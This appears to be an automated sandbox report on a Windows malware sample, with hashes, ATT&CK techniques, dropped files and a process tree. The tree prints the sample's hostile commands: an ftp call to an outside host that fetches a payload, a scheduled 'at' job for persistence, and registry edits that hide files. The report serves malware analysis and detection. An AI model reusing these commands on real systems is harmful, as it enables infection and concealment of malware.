38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7

Analysis

max time kernel
52s
max time network
51s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
19/09/2022, 02:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe
Size

56KB
MD5

60954545cc62086f5b77c597acce4295
SHA1

17e05d05ba3b0a65f5b281691e785cfceb196cd4
SHA256

38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7
SHA512

8373b159d1ec0c788db70060f55dc30434b61c58de55c829c5fb5548cdf65312d73fed5f8113ce63cc7a588ff0fcc8a62bdabae4f69150855d7021e285d0a4fd
SSDEEP

768:/P6/H8ADIN6JxO0HwocGCev7MEtOiDSv0GguqiBG9iEF:/SYv4Q4RIguq6GfF

Score

10^/10

evasion

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\WINDOWS\SysWOW64\winhfttp.dll	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe
File created	C:\WINDOWS\SysWOW64\at.bat	cmd.exe
File opened for modification	C:\WINDOWS\SysWOW64\at.bat	cmd.exe
File opened for modification	C:\WINDOWS\SysWOW64\systemll.txt	cmd.exe
File created	C:\WINDOWS\SysWOW64\jan100.bat	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe
File created	C:\WINDOWS\SysWOW64\jan.bat	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe
File created	C:\WINDOWS\SysWOW64\alvsvc.dll	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1552	sc.exe
1388	sc.exe
1708	sc.exe
1436	sc.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
1512	reg.exe
1064	reg.exe
580	reg.exe

Runs net.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1688 wrote to memory of 1388	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	28
PID 1688 wrote to memory of 1388	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	28
PID 1688 wrote to memory of 1388	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	28
PID 1688 wrote to memory of 1388	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	28
PID 1688 wrote to memory of 1708	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	30
PID 1688 wrote to memory of 1708	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	30
PID 1688 wrote to memory of 1708	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	30
PID 1688 wrote to memory of 1708	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	30
PID 1688 wrote to memory of 2020	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	32
PID 1688 wrote to memory of 2020	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	32
PID 1688 wrote to memory of 2020	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	32
PID 1688 wrote to memory of 2020	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	32
PID 1688 wrote to memory of 776	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	34
PID 1688 wrote to memory of 776	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	34
PID 1688 wrote to memory of 776	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	34
PID 1688 wrote to memory of 776	1688	38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe	34
PID 776 wrote to memory of 1436	776	cmd.exe	36
PID 776 wrote to memory of 1436	776	cmd.exe	36
PID 776 wrote to memory of 1436	776	cmd.exe	36
PID 776 wrote to memory of 1436	776	cmd.exe	36
PID 776 wrote to memory of 856	776	cmd.exe	37
PID 776 wrote to memory of 856	776	cmd.exe	37
PID 776 wrote to memory of 856	776	cmd.exe	37
PID 776 wrote to memory of 856	776	cmd.exe	37
PID 856 wrote to memory of 868	856	net.exe	38
PID 856 wrote to memory of 868	856	net.exe	38
PID 856 wrote to memory of 868	856	net.exe	38
PID 856 wrote to memory of 868	856	net.exe	38
PID 776 wrote to memory of 1552	776	cmd.exe	39
PID 776 wrote to memory of 1552	776	cmd.exe	39
PID 776 wrote to memory of 1552	776	cmd.exe	39
PID 776 wrote to memory of 1552	776	cmd.exe	39
PID 776 wrote to memory of 1036	776	cmd.exe	40
PID 776 wrote to memory of 1036	776	cmd.exe	40
PID 776 wrote to memory of 1036	776	cmd.exe	40
PID 776 wrote to memory of 1036	776	cmd.exe	40
PID 776 wrote to memory of 688	776	cmd.exe	41
PID 776 wrote to memory of 688	776	cmd.exe	41
PID 776 wrote to memory of 688	776	cmd.exe	41
PID 776 wrote to memory of 688	776	cmd.exe	41
PID 776 wrote to memory of 1512	776	cmd.exe	42
PID 776 wrote to memory of 1512	776	cmd.exe	42
PID 776 wrote to memory of 1512	776	cmd.exe	42
PID 776 wrote to memory of 1512	776	cmd.exe	42
PID 776 wrote to memory of 1064	776	cmd.exe	43
PID 776 wrote to memory of 1064	776	cmd.exe	43
PID 776 wrote to memory of 1064	776	cmd.exe	43
PID 776 wrote to memory of 1064	776	cmd.exe	43
PID 776 wrote to memory of 580	776	cmd.exe	44
PID 776 wrote to memory of 580	776	cmd.exe	44
PID 776 wrote to memory of 580	776	cmd.exe	44
PID 776 wrote to memory of 580	776	cmd.exe	44

C:\Users\Admin\AppData\Local\Temp\38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe
"C:\Users\Admin\AppData\Local\Temp\38d79733be993590598d12e4bb98eaf3435560b456c29351378951ba75dd28f7.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1688
- C:\Windows\SysWOW64\sc.exe
  sc config schedule start= auto
  2⤵
  - Launches sc.exe
  PID:1388
- C:\Windows\SysWOW64\sc.exe
  sc start schedule
  2⤵
  - Launches sc.exe
  PID:1708
- C:\Windows\SysWOW64\ftp.exe
  ftp -s:C:\WINDOWS\system32\alvsvc.dll ip993-3.3322.org
  2⤵
  PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\WINDOWS\system32\jan100.bat
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:776
- - C:\Windows\SysWOW64\sc.exe
    sc config schedule start= auto
    3⤵
    - Launches sc.exe
    PID:1436
- - C:\Windows\SysWOW64\net.exe
    net start schedule
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:856
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start schedule
      4⤵
      PID:868
- - C:\Windows\SysWOW64\sc.exe
    sc start schedule
    3⤵
    - Launches sc.exe
    PID:1552
- - C:\Windows\SysWOW64\at.exe
    at 6:1 cmd /c "C:\WINDOWS\system32\jan.bat"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\at.exe
    at /?
    3⤵
    PID:688
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Modifies registry key
    PID:1064
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Modifies registry key
    PID:580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\WINDOWS\SysWOW64\alvsvc.dll

Filesize
215B

MD5
a43340ea5d357d54a3f056c9382cbb2f

SHA1
dd71bfe4e8e157f1036348f7f3795c870073980a

SHA256
012909f3774de98b280dab9044b8e2d8d3ae5003bead4b0da47367cc7ecdf01d

SHA512
f5858b86c56de7016865bd29a26042cf6e4a541522db92a43ffce3b8ec8d90f5fb62741a71c20878994c24f56752da02e5d3e23862a2f37ae8e896377f70353e

Download Submit
C:\WINDOWS\SysWOW64\jan100.bat

Filesize
1KB

MD5
027073e53260c0758bf8549842803b9d

SHA1
97b4e1f41e06faae728c45f0afc583a15241887d

SHA256
0a7569970f11190776d2f4f3f0d9c1e925bd0d98f78fea12777d33f910472539

SHA512
28fa77a598f989cf1fac4a7ee71a92f9315d49af0e2b099512a6d0007ee603736b457ef2286cde12d2db626ccc9c257354ac983044d6e2235e3f66983439b545

Download Submit
memory/1036-67-0x00000000763F1000-0x00000000763F3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads